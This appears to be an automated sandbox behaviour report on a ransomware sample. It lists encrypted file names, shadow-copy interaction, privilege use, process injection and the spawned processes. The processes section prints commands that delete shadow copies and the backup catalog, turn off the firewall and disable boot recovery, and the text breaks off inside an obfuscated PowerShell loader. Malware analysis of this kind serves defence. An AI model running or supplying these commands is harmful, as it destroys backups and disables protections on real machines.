File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.png.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_13c.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-48.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\WindowsAccessBridge-64.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_TW.properties.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmagnify_plugin.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote.cat.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\ShareMainPage.xaml | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\wfh.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-black_scale-100.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\download-btn.png.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Grace-ul-oob.xrm-ms.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\en-US\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_PDF.DLL.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotExist.snippets.ps1xml | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926556.profile.gz | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Java\jre1.8.0_66\bin\dt_shmem.dll.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\msadco.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Excel.Amo.Core.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VBAOWS10.CHM | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_unselected_18.svg | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\orsbwqnkccnffcxpogd.job C:\Users\Admin\AppData\Local\Temp\3F9.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\hhftgie N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\bwll.exe N/A

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hhftgie N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\233.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2156 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 3216 N/A N/A C:\Users\Admin\AppData\Local\Temp\FFA2.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 4952 N/A N/A C:\Users\Admin\AppData\Local\Temp\233.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2112 N/A N/A C:\Users\Admin\AppData\Local\Temp\3F9.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1464 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3616 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 3856 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4768 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 2744 N/A N/A C:\Windows\explorer.exe
PID 4952 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 4952 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\233.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 4224 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1236 N/A N/A C:\Windows\explorer.exe
PID 4704 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4704 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3080 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3080 wrote to memory of 4076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 2916 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 3200 wrote to memory of 1592 N/A N/A C:\Windows\explorer.exe
PID 4704 wrote to memory of 3016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4704 wrote to memory of 3016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3080 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3080 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3200 wrote to memory of 3836 N/A N/A C:\Windows\SysWOW64\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

C:\Users\Admin\AppData\Local\Temp\3F9.exe

C:\Users\Admin\AppData\Local\Temp\3F9.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\233.exe

"C:\Users\Admin\AppData\Local\Temp\233.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\FFA2.exe

"C:\Users\Admin\AppData\Local\Temp\FFA2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function 